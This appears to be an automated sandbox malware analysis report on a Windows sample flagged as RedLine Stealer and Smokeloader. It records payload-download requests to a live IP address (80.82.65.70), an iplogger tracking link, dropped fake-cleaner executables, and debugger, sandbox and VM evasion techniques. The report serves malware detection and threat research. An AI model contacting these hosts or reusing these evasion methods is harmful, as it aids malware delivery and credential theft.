Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1574459
MD5: 2e164f8eb316718ae1c48ed84e05dc9f
SHA1: 653b1c1598a62782b58e52dd3f2c53355aad94fa
SHA256: 323426e01a17e9974e2c710c0708a7232d250a2a7aa815ee7fdfac5f634af0e2
Tags: exe user-Bitsight
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2E164F8EB316718AE1C48ED84E05DC9F)
    • WerFault.exe (PID: 4632 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 584 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Yara matches (Source / Rule / Description / Author / Strings):
Source: 00000000.00000002.2878196099.0000000000F6C000.00000040.00000020.00020000.00000000.sdmp
Rule: Windows_Trojan_RedLineStealer_ed346e4c
Description: unknown
Author: unknown
Strings:
  • 0x10d8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Source: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp
Rule: Windows_Trojan_Smokeloader_3687686f
Description: unknown
Author: unknown
Strings:
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: file.exe Avira: detected
Source: http://80.82.65.70/dll/key; Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1] ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exe ReversingLabs: Detection: 75%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1] Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004035B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004035B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B63817 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_04B63817
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004176E7 FindFirstFileExW,0_2_004176E7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B7794E FindFirstFileExW,0_2_04B7794E
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 09:49:13 GMT Server: Apache/2.4.58 (Ubuntu) Content-Disposition: attachment; filename="dll"; Content-Length: 242176 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 09:49:15 GMT Server: Apache/2.4.58 (Ubuntu) Content-Disposition: attachment; filename="soft"; Content-Length: 1502720 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/octet-stream
Source: Joe Sandbox View IP Address: 80.82.65.70 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401940
Source: global traffic HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: 1 Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: 1 Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: 1 Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: d Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 User-Agent: s Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Source: file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
Source: file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2509895902.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2484413673.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2880688079.00000000055C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2458794612.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp=
Source: file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2509895902.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2484413673.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2458794612.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=empW
Source: file.exe, 00000000.00000002.2880688079.00000000055C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/download
Source: file.exe, 00000000.00000002.2880688079.00000000055C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/downloadC
Source: file.exe, 00000000.00000002.2878230701.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/key;
Source: file.exe, 00000000.00000002.2878230701.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/keyk
Source: file.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2509895902.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2484413673.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2458794612.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/keyutils.dll
Source: file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download
Source: file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download0/files/download
Source: file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download0/files/downloadA
Source: file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download21-573d1d5ce43f
Source: file.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadA
Source: file.exe, 00000000.00000002.2880688079.00000000055C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2878230701.0000000001009000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/download
Source: file.exe, 00000000.00000002.2878230701.0000000001009000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/downloadvv
Source: Amcache.hve.13.drString found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.2786188984.0000000005680000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783183777.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.000000000565F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2784140724.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: file.exe, 00000000.00000003.2786188984.0000000005680000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783183777.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.000000000565F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2784140724.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000000.00000003.2786188984.0000000005680000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783183777.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.000000000565F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2784140724.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

Source: 00000000.00000002.2878196099.0000000000F6C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\file.exe, Code function: String function: 04D09B60 appears 35 times
Source: C:\Users\user\Desktop\file.exe, Code function: String function: 04B6A9C7 appears 35 times
Source: C:\Users\user\Desktop\file.exe, Code function: String function: 0040A760 appears 35 times
Source: C:\Users\user\Desktop\file.exe, Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\file.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 584
Source: file.exe, Static PE information: Resource name: RT_CURSOR type: DOS executable (COM, 0x8C-variant)
Source: file.exe, Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.exe, 00000000.00000003.2804013001.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
Source: file.exe, 00000000.00000003.2804529313.00000000055E5000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2878196099.0000000000F6C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Y-Cleaner.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine, Classification label: mal100.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00F6D106 CreateToolhelp32Snapshot,Module32First
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance
Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\add[1].htm
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7480
Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0
Source: C:\Users\user\Desktop\file.exe, Command line argument: emp, 0_2_00408770
Source: C:\Users\user\Desktop\file.exe, Command line argument: mixtwo, 0_2_00408770
Source: C:\Users\user\Desktop\file.exe, File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe, String found in binary or memory: 80.82.65.70/add?substr=mixtwo&s=three&sub=emp
Source: unknown, Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 584
Source: C:\Users\user\Desktop\file.exe, Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\file.exe, Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\file.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Cleaner.lnk.0.dr, LNK file: ..\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exe
Source: file.exe, Static file information: File size 1966080 > 1048576
Source: C:\Users\user\Desktop\file.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe, Static PE information: Raw size of xzazwoxl is bigger than: 0x100000 < 0x1adc00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe, Unpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xzazwoxl:EW;tfoohvpc:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.0.dr, Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sample, Static PE information: section where entry point is pointing to: .taggant
Source: dll[1].0.dr, Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.dr, Static PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.dr, Static PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.dr, Static PE information: real checksum: 0x0 should be: 0x170243
Source: file.exe, Static PE information: real checksum: 0x1e4ce0 should be: 0x1e3e31
Source: file.exe, Static PE information: section name:
Source: file.exe, Static PE information: section name: .idata
Source: file.exe, Static PE information: section name:
Source: file.exe, Static PE information: section name: xzazwoxl
Source: file.exe, Static PE information: section name: tfoohvpc
Source: file.exe, Static PE information: section name: .taggant
Source: file.exe, Static PE information: section name: xzazwoxl entropy: 7.94137094600595
Source: Y-Cleaner.exe.0.dr, Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.dr, Static PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1] (dropped file)
Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exe (dropped file)
Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Bunifu_UI_v1.5.3.dll (dropped file)
Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] (dropped file)

Boot Survival

Source: C:\Users\user\Desktop\file.exe, Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe, Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe, Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe, Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe, Window searched: window name: Filemonclass
Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe, File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe, File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0AC0 second address: 9D0AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC134D1C046h 0x0000000a pop eax 0x0000000b je 00007FC134D1C04Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0C22 second address: 9D0C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0C28 second address: 9D0C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC134D1C04Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0C3A second address: 9D0C40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0F68 second address: 9D0F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007FC134D1C046h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0F87 second address: 9D0F8F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0F8F second address: 9D0F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC134D1C04Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D123A second address: 9D123E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D123E second address: 9D128E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FC134D1C057h 0x00000010 jmp 00007FC134D1C04Fh 0x00000015 jmp 00007FC134D1C056h 0x0000001a popad 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D128E second address: 9D1294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1294 second address: 9D1298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1298 second address: 9D12A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jng 00007FC1350240D2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1555 second address: 9D1562 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC134D1C046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3231 second address: 9D324B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FC1350240CEh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
